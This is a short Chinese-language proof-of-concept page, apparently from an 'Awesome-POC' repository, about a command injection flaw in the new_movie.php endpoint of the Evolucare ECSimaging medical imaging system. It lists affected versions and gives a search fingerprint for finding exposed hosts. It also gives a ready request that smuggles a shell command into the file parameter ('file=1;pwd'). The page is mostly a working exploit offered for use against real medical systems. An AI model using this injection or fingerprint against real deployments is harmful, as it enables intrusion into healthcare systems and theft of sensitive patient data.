Awesome-POC/Web应用漏洞/Evolucare Ecsimaging new_movie.php 远程命令执行漏洞.md
2024-11-06 14:10:36 +08:00

31 lines
544 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Evolucare Ecsimaging new_movie.php 远程命令执行漏洞
## 漏洞描述
EVOLUCARE ECSimage是一款国外使用的医疗管理系统研究发现其new_movie.php接口中存在命令注入漏洞,攻击者可利用该漏洞获取系统敏感信息等.
## 漏洞影响
```
EVOLUCARE Evolucare Ecsimaging 版本< 6.21.5
```
## 网络测绘
```
body="ECSimaging"
```
## 漏洞复现
登录页面
![](images/202205241447357.png)
验证POC
```
/new_movie.php?studyUID=1&start=2&end=2&file=1;pwd
```
![](images/202205241447391.png)